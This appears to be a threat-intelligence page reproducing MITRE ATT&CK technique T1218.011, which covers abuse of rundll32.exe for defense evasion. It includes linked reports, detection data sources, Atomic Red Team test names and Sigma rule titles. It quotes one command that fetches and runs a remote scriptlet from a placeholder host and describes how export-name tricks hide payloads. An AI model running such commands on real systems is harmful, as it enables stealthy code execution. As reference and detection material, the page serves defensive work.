T1218.011: Rundll32
| View on MITRE ATT&CK | T1218.011 |
|---|---|
| Tactic(s) | Defense Evasion |
Data from MITRE ATT&CK®:
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
Cyber Threat Graph Context
Explore how this ATT&CK Technique relates to the wider threat graph
Reporting on this Technique
REDCURL - The pentest you didn't know about
This report by researchers at Group-IB outlines activity by a group they call RedCurl. The report identifies victimology and motivation (corporate ...
KAPEKA A novel backdoor spotted in Eastern Europe
This report from researchers at WithSecure unveils a novel backdoor: 'Kapeka'. Kapeka has been used against victims in Eastern Europe ...
Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation
This blog post by threat researchers at Mandiant outlines intrusions activity by the UNC3886 intrusion set which involved the deployment of ...
From OneNote to RansomNote: An Ice Cold Intrusion
This case report from The DFIR Report describes an intrusion which started with a malicious OneNote attachment. Opening the OneNote file led to ...
Mitigations for this technique
MITRE ATT&CK Mitigations
How to detect this technique
MITRE ATT&CK Data Components
File Metadata (File)
Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.Module Load (Module)
Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)Command Execution (Command)
The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )Process Creation (Process)
The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)Control Validation Tests for this Technique
Use Atomic Red Team tests to test your defenses against this technique.
Rundll32 with Control_RunDLL
Rundll32 setupapi.dll Execution
Rundll32 with desk.cpl
Rundll32 execute VBscript command using Ordinal number
Rundll32 ieadvpack.dll Execution
Execution of HTA and VBS Files using Rundll32 and URL.dll
Rundll32 advpack.dll Execution
Rundll32 execute VBscript command
Launches an executable using Rundll32 and pcwutl.dll
Rundll32 syssetup.dll Execution
Execution of non-dll using rundll32.exe
Running DLL with .init extension and function
Rundll32 execute command via FileProtocolHandler
Rundll32 execute JavaScript Remote Payload With GetObject
Rundll32 with Ordinal Value
Sigma Detections for this Technique
Code Execution via Pcwutl.dll
Rundll32 InstallScreenSaver Execution
Rundll32 Internet Connection
Rundll32 Execution With Uncommon DLL Extension
Process Access via TrolleyExpress Exclusion
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Unsigned DLL Loaded by Windows Utility
Outbound Network Connection To Public IP Via Winlogon
Remote Thread Creation Via PowerShell In Uncommon Target
HackTool - F-Secure C3 Load by Rundll32
RunDLL32 Spawning Explorer
Rundll32 UNC Path Execution
Suspicious Rundll32 Activity Invoking Sys File
ScreenSaver Registry Key Set
Suspicious Rundll32 Setupapi.dll Activity
Suspicious Call by Ordinal
Potential PowerShell Execution Via DLL
HackTool - RedMimicry Winnti Playbook Execution
Potentially Suspicious Rundll32 Activity
Suspicious HH.EXE Execution
Suspicious Rundll32 Execution With Image Extension
Shell32 DLL Execution in Suspicious Directory
HTML Help HH.EXE Suspicious Child Process
SCR File Write Event
Suspicious Control Panel DLL Load
CobaltStrike Load by Rundll32
SP800-53 Controls
See which controls can help protect against this MITRE ATT&CK technique. This is based on mappings to associated SP800-53 controls produced by the MITRE Engenuity Center for Threat-Informed Defense.